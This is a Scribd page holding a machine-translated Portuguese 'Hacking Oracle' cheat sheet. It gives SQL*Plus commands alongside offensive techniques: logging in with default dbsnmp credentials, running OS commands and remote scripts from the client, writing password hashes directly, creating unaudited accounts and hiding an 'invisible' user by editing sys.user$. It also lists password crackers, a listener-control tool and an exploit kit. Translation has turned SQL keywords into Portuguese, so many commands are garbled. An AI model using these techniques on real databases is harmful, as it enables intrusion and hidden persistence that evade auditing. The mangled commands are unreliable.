0% acharam este documento útil (0 voto)
6 visualizações1 página

Comandos e Dicas SQL*Plus Oracle

O documento fornece informações sobre comandos SQL*Plus, diferentes maneiras de alterar senhas do Oracle, criar usuários do Oracle, obter o nível de patch e ferramentas e links úteis para avaliações de segurança do Oracle. Ele lista comandos SQL*Plus como conectar, executar scripts e formatar a saída. Também descreve métodos para alterar senhas com declarações SQL, atualizar hashes de senha diretamente no dicionário de dados e criar papéis e usuários com concessões. Os níveis de patch podem ser obtidos usando opatch ou consultando o banco de dados. As ferramentas úteis listadas quebram senhas, analisam listeners, pesquisam bancos de dados e controlam listeners TNS.

Traduzido por

ScribdTranslations
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd
0% acharam este documento útil (0 voto)
6 visualizações1 página

Comandos e Dicas SQL*Plus Oracle

O documento fornece informações sobre comandos SQL*Plus, diferentes maneiras de alterar senhas do Oracle, criar usuários do Oracle, obter o nível de patch e ferramentas e links úteis para avaliações de segurança do Oracle. Ele lista comandos SQL*Plus como conectar, executar scripts e formatar a saída. Também descreve métodos para alterar senhas com declarações SQL, atualizar hashes de senha diretamente no dicionário de dados e criar papéis e usuários com concessões. Os níveis de patch podem ser obtidos usando opatch ou consultando o banco de dados. As ferramentas úteis listadas quebram senhas, analisam listeners, pesquisam bancos de dados e controlam listeners TNS.

Traduzido por

ScribdTranslations
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd

Comandos SQL*Plus (nem sempre suportados em outros clientes como TOAD, SQL*Navigator,…)

Conecte-se com fácil conexão:


sqlplus dbsmp/dbsnmp@[Link]:1521/orcl – funciona apenas com clientes Oracle 10g/11g

Comandos do SQL*Plus:
@[Link] -- executar um script SQL de um servidor HTTP (FTP também é possível)

mostrar parâmetro -- mostrar todos os parâmetros do banco de dados


mostrar parâmetro de auditoria -- mostrar configurações de auditoria

defina o termo desligado -- desativar a saída do terminal


definir termo ligado -- habilitar saída do terminal
Desativar cabeçalho -- desativar manchetes
Definir tamanho da página 0 -- desabilitar tamanho da página

Definir hora em -- mostrar tempo de execução


Definir autocommit como ligado -- comitar tudo após cada comando (!perigoso!)

host [Link] /c 0wned > c:\[Link] -- execute comandos do sistema operacional a partir do sqlplus (no cliente), em vez de usar o atalho host, ! (unix) ou $ (Windows) também são possíveis

defina serveroutput on -- habilitar saída do dbms_output

spool c:\[Link] -- crie um arquivo de log da sessão SQL*Plus chamado [Link] (desative: spool off)

desc utl_http -- mostrar especificação do pacote utl_http


desc todos_os_usuários -- mostrar especificação da visão de todos_os_usuarios

Diferentes maneiras de mudar senhas do Oracle:


Com o cmd de Senha do SQL*Plus: sistema de senha; -- Password not send in cleartext
Com o comando Alter user: alterar usuário sistema identificado por rds2008; -- Senha enviada em texto claro pela rede
Com o comando Alter user: alterar usuário sistema identificado por valores '737B466C2DF536B9'; -- Defina uma hash de senha diretamente
Com concessão: conceder conexão ao sistema identificado por rds2008; -- Senha enviada em texto claro pela rede
Com atualização: atualizar [Link]$ definir senha = '737B466C2DF536B9' onde nome='SYSTEM'; -- Não suportado, não auditável, limpeza do caixa de dicionário necessária
(alterar sistema limpar pool_compartilhado;)
Criar Usuário Oracle:
Com o comando criar usuário: criar usuário user1 identificado por rds2008; conceder dba a user1; -- Senha enviada em texto claro pela rede
Com o comando criar função: criar função user1 identificada por rds2008; atualizar [Link]$ set type#=1 onde name=’USER1'; -- Criar um papel e mudar o tipo. Não auditado
Com concessão: conceder dba ao usuário1 identificado por rds2008; -- Privilégio concedido, Usuário será criado se não existir
Com subsídio: conceder acesso a user1, user2, user3, user4 identificado por user1, user2, user3, user4; Senha enviada em texto claro pela rede
Usuário Invisível: atualizar [Link]$ definir type#=2 onde nome='USER1'; -- Ocultar um usuário nas visões dba_user/all_users, nenhuma modificação de visão é necessária

Obter Nível do Patch:


Obter nível de patch via opatch: opatch lsinventory; -- Obtenha o nível de patch via opatch (no servidor DB, nível do SO)
Obter Patchlevel via SQL: selecione * do histórico_dba_registry; -- Obter a última CPU aplicada

Ferramentas / Links Úteis:


checkpwd: [Link] -- o mais rápido cracker de senhas de dicionário Oracle multiplataforma
woraauthbf [Link] -- o mais rápido cracker de força bruta Oracle
[Link] [Link] -- obter uma lista de senhas de aplicativo + tipo
[Link] [Link] -- procurar uma string específica no banco de dados
[Link] [Link] -- analisar log do listener Oracle
tnscmd [Link] -- controlar Listener TNS desprotegido sem Cliente Oracle
sidguess: [Link] -- o mais rápido quebrador de senhas do dicionário Oracle
Kit de Avaliação da Oracle: [Link] -- ferramentas úteis, por exemplo, para explorar o bug de alterar sessão
Oracle Instant Client [Link] -- Cliente Instantâneo Oracle
Oracle SQL Developer [Link] -- Ferramenta GUI para Oracle em Java
Voltar 2 [Link] -- CD Live do Linux com muitas ferramentas de segurança Oracle

Hackeando o Oracle – [Link] - Version 1.5.0 - 29-Jan-2008

Você também pode gostar